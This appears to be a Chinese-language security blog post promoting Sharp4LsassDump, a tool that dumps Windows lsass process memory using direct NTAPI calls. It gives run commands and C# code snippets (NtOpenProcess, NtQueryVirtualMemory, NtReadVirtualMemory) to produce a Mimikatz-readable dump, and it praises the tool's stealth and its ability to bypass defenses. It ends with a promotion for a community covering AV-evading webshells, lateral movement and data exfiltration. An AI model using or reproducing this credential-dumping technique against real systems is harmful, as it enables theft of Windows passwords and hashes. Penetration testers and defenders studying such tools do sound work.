01阅读须知
此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他方面
02基本介绍
Sharp4LsassDump是一款专为Windows系统设计的lsass进程转储工具,使用NTAPI而非常见的dbghelp!MinidumpWriteDump函数,生成一个转储文件。这个文件仅包含解析工具如Mimikatz所需的流,包括SystemInfo、ModuleList和Memory64List等流。
03使用方法
Sharp4LsassDump的使用非常简单,支持两种运行方式:默认情况下,Sharp4LsassDump会在当前目录下生成转储文件。另外,可以传入一个参数[DUMP_FILE]来指定转储文件的保存路径。具体用法如下所示。
Sharp4LsassDump.exe
Sharp4LsassDump.exe C:\dump\lsass.dmp
04原理解析
Sharp4LsassDump的核心在于通过NTAPI进行进程内存的读取与操作。部分核心代码如下:
IntPtr processHandle = IntPtr.Zero;
CLIENT_ID client_id = new CLIENT_ID();
client_id.UniqueProcess = (IntPtr)processPID;
client_id.UniqueThread = IntPtr.Zero;
OBJECT_ATTRIBUTES objAttr = new OBJECT_ATTRIBUTES();
uint ntstatus = NtOpenProcess(ref processHandle, PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, ref objAttr, ref client_id);
首先,通过NtOpenProcess函数打开目标进程句柄,指定的权限为PROCESS_QUERY_INFORMATION和PROCESS_VM_READ,允许我们查询进程信息及读取其虚拟内存。接着,通过CustomGetModuleHandle函数获取lsasrv.dll模块的加载地址:
IntPtr lsasrvdll_address = CustomGetModuleHandle(processHandle, "lsasrv.dll");
int lsasrvdll_size = 0;
bool bool_test = false;
接下来是查询虚拟内存信息并读取lsass进程的指定内存区域,通过NtQueryVirtualMemory获取指定内存地址的内存信息,然后使用NtReadVirtualMemory函数读取该区域的内存数据并存储到buffer数组中。
MEMORY_BASIC_INFORMATION mbi = new MEMORY_BASIC_INFORMATION();
ntstatus = NtQueryVirtualMemory(processHandle, (IntPtr)mem_address, MemoryBasicInformation, out mbi, 0x30, out _);
byte[] buffer = new byte[(int)mbi.RegionSize];
ntstatus = NtReadVirtualMemory(processHandle, mbi.BaseAddress, buffer, (int)mbi.RegionSize, out _);
随后,将读取的数据与现有的memory_regions数组拼接在一起,形成最终的转储数据
byte[] new_bytearray = new byte[memory_regions.Length + buffer.Length];
Buffer.BlockCopy(memory_regions, 0, new_bytearray, 0, memory_regions.Length);
Buffer.BlockCopy(buffer, 0, new_bytearray, memory_regions.Length, buffer.Length);
memory_regions = new_bytearray;
通过这种方式,Sharp4LsassDump能够仅将必要的内存区域存储到转储文件中,而不会转储整个lsass进程的内存。
综上,Sharp4LsassDump是一款功能强大且隐蔽性高的lsass进程转储工具,适用于各种渗透测试场景。它通过NTAPI的直接调用来实现转储操作,避免了使用传统的MinidumpWriteDump函数,从而能够绕过多种防护措施。这款工具在Windows 10和11上的测试表现非常稳定,对于安全研究人员和渗透测试人员来说,具有较高的实用价值。
05.NET安全星球
目前dot.Net安全矩阵星球已成为中国.NET安全领域最知名、最活跃的技术知识库之一,从.NET Framework到.NET Core,每日分享.NET安全技术干货以及交流解答各类技术等问题,社区中发布很多高质量的.NET安全资源,可以说市面上很少见,都是干货。
星球文化20+个专题栏目涵盖了点、线、面、体等知识面,助力师傅们快速成长!其中主题包括.NET Tricks、漏洞分析、内存马、代码审计、预编译、反序列化、webshell免杀、命令执行、C#工具库等等。
我们倾力打造专刊、视频等配套学习资源,循序渐进的方式引导加深安全攻防技术提高以及岗位内推等等服务。
.NET 免杀WebShell
.NET 反序列化漏洞
.NET 安全防御绕过
.NET 内网信息收集
.NET 本地权限提升
.NET 内网横向移动
.NET 目标权限维持
.NET 数据外发传输